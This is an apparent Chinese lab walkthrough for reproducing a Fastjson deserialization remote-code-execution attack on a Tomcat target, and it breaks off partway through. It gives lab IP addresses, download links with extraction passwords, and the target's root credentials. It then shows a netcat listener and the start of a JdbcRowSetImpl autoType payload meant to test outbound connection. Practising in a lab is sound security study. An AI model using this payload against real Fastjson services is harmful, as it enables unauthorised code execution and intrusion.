靶机IP:192.168.253.134
攻击机IP:192.168.142.44
1、靶机环境搭建
靶机:http://caiyun.feixin.10086.cn/dl/095CteuquNKVq 提取密码:NNPD
RCE:http://caiyun.feixin.10086.cn/dl/095CuIsJQOw14 提取密码:J2vd
靶机账号密码:root;toor
tomcat路径:/usr/local/tomcat/apache-tomcat-9.0.27/
jdk版本:
访问靶机Web服务:
被fastjson调用解析的参数:
2、攻击机环境准备
(1)监听流量
nc -lvvp 5555
(2)测试外连
{
"name": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"x": {